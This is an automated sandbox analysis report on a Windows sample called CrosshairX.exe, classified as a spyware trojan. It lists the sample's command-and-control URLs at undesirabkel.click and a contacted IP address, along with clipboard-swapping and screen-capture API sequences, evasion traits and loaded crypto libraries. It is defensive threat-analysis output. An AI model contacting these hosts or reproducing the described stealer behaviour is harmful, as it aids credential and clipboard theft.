Source: CrosshairX.exe, 00000003.00000002.2909653256.0000000003ADA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/
Source: CrosshairX.exe, 00000003.00000002.2909154607.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/F
Source: CrosshairX.exe, 00000003.00000002.2909263330.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, CrosshairX.exe, 00000003.00000002.2909333934.000000000142B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/api
Source: CrosshairX.exe, 00000003.00000002.2909263330.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/api=
Source: CrosshairX.exe, 00000003.00000002.2909333934.000000000142B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/apiA
Source: CrosshairX.exe, 00000003.00000002.2909263330.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/apiE

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: C:\Users\user\Desktop\CrosshairX.exe

Code function: 3_2_00438A00 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_00438A00

Source: C:\Users\user\Desktop\CrosshairX.exe

Code function: 3_2_03931000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

3_2_03931000

Source: C:\Users\user\Desktop\CrosshairX.exe

Code function: 3_2_00438A00 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_00438A00

Source: C:\Users\user\Desktop\CrosshairX.exe

Code function: 3_2_00438BA0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

3_2_00438BA0

Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0041616F	3_2_0041616F
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00426970	3_2_00426970
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0040E9C9	3_2_0040E9C9
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0043DA40	3_2_0043DA40
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00422A9B	3_2_00422A9B
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00412BE0	3_2_00412BE0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00423410	3_2_00423410
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0043DCC0	3_2_0043DCC0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_004454A0	3_2_004454A0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0040AE20	3_2_0040AE20
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00445E20	3_2_00445E20
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00429F30	3_2_00429F30
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0040D7E3	3_2_0040D7E3
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0041B840	3_2_0041B840
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0043F040	3_2_0043F040
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00406860	3_2_00406860
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00444870	3_2_00444870
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0042C006	3_2_0042C006
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00420818	3_2_00420818
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00412030	3_2_00412030
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_004150C0	3_2_004150C0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0041A8F0	3_2_0041A8F0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_004378FB	3_2_004378FB
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00445880	3_2_00445880
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00436090	3_2_00436090
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_004288AE	3_2_004288AE
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0041C8BF	3_2_0041C8BF
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00428950	3_2_00428950
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00444960	3_2_00444960
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00444979	3_2_00444979
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0044497B	3_2_0044497B
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00427100	3_2_00427100
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00432131	3_2_00432131
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_004039C0	3_2_004039C0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0043D1D0	3_2_0043D1D0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00426191	3_2_00426191
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_004099A0	3_2_004099A0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0041E200	3_2_0041E200
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00437209	3_2_00437209
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00445220	3_2_00445220
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00444AC0	3_2_00444AC0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0043EAD0	3_2_0043EAD0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00419F95	3_2_00419F95
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0043C2DE	3_2_0043C2DE
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0043F2A0	3_2_0043F2A0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00417B48	3_2_00417B48
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00445B60	3_2_00445B60
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00405B70	3_2_00405B70
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00404370	3_2_00404370
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00417306	3_2_00417306
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0043BB2E	3_2_0043BB2E
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0040BB3C	3_2_0040BB3C
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0043533C	3_2_0043533C
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_004063D0	3_2_004063D0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_004223E6	3_2_004223E6
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00402BA0	3_2_00402BA0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0040B3A0	3_2_0040B3A0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00415BA0	3_2_00415BA0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0043B44E	3_2_0043B44E
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00418459	3_2_00418459
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0041CC70	3_2_0041CC70
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00436400	3_2_00436400
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00432413	3_2_00432413
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00444C10	3_2_00444C10
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0043D430	3_2_0043D430
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0041B4F0	3_2_0041B4F0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_004424F7	3_2_004424F7
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_004094A0	3_2_004094A0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00433CB6	3_2_00433CB6
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0041D510	3_2_0041D510
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_004385C0	3_2_004385C0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_004105CB	3_2_004105CB
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00407640	3_2_00407640
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00429670	3_2_00429670
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0041E610	3_2_0041E610
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0042A630	3_2_0042A630
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00427EF4	3_2_00427EF4
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00404E90	3_2_00404E90
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0041DEA0	3_2_0041DEA0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00441F40	3_2_00441F40
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00432F50	3_2_00432F50
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0042FF00	3_2_0042FF00
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0042B706	3_2_0042B706
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0042AF1D	3_2_0042AF1D
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00420F8A	3_2_00420F8A
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00419F95	3_2_00419F95
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_00402FA0	3_2_00402FA0
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_004417B0	3_2_004417B0

Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: String function: 004150B0 appears 121 times
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: String function: 004081D0 appears 46 times

Source: C:\Users\user\Desktop\CrosshairX.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7320 -s 928

Source: CrosshairX.exe, 00000000.00000002.1834007753.000000000069E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs CrosshairX.exe
Source: CrosshairX.exe, 00000000.00000000.1645665158.00000000000D8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHandler.exe0 vs CrosshairX.exe
Source: CrosshairX.exe, 00000000.00000002.1834779004.0000000003649000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHandler.exe0 vs CrosshairX.exe
Source: CrosshairX.exe	Binary or memory string: OriginalFilenameHandler.exe0 vs CrosshairX.exe

Source: CrosshairX.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: CrosshairX.exe

Static PE information: Section: .BSS ZLIB complexity 1.000333021313364

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@1/1

Source: C:\Users\user\Desktop\CrosshairX.exe

Code function: 3_2_0043DCC0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

3_2_0043DCC0

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Users\user\Desktop\CrosshairX.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7320

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\aeb10804-9e61-4886-8440-9705c5ee8831

Jump to behavior

Source: CrosshairX.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: CrosshairX.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\CrosshairX.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\CrosshairX.exe

File read: C:\Users\user\Desktop\CrosshairX.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\CrosshairX.exe "C:\Users\user\Desktop\CrosshairX.exe"
Source: C:\Users\user\Desktop\CrosshairX.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CrosshairX.exe	Process created: C:\Users\user\Desktop\CrosshairX.exe "C:\Users\user\Desktop\CrosshairX.exe"
Source: C:\Users\user\Desktop\CrosshairX.exe	Process created: C:\Users\user\Desktop\CrosshairX.exe "C:\Users\user\Desktop\CrosshairX.exe"
Source: C:\Users\user\Desktop\CrosshairX.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7320 -s 928
Source: C:\Users\user\Desktop\CrosshairX.exe	Process created: C:\Users\user\Desktop\CrosshairX.exe "C:\Users\user\Desktop\CrosshairX.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process created: C:\Users\user\Desktop\CrosshairX.exe "C:\Users\user\Desktop\CrosshairX.exe"	Jump to behavior

Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: CrosshairX.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: CrosshairX.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: CrosshairX.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Handler.pdbxa source: CrosshairX.exe
Source:	Binary string: System.Windows.Forms.pdb source: WER21F9.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb source: WER21F9.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdbRSDS source: WER21F9.tmp.dmp.6.dr
Source:	Binary string: System.pdbh source: WER21F9.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WER21F9.tmp.dmp.6.dr
Source:	Binary string: Handler.pdb source: CrosshairX.exe, WER21F9.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER21F9.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdb source: WER21F9.tmp.dmp.6.dr
Source:	Binary string: System.pdb source: WER21F9.tmp.dmp.6.dr

Source: CrosshairX.exe

Static PE information: 0xB98C4C41 [Thu Aug 23 20:32:01 2068 UTC]

Source: CrosshairX.exe

Static PE information: real checksum: 0x965af14 should be: 0x654b9

Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0044DB02 push esi; ret	3_2_0044DB28
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0044DB2E push esi; ret	3_2_0044DB28
Source: C:\Users\user\Desktop\CrosshairX.exe	Code function: 3_2_0044DD05 push cs; ret	3_2_0044DD06

Source: C:\Users\user\Desktop\CrosshairX.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CrosshairX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
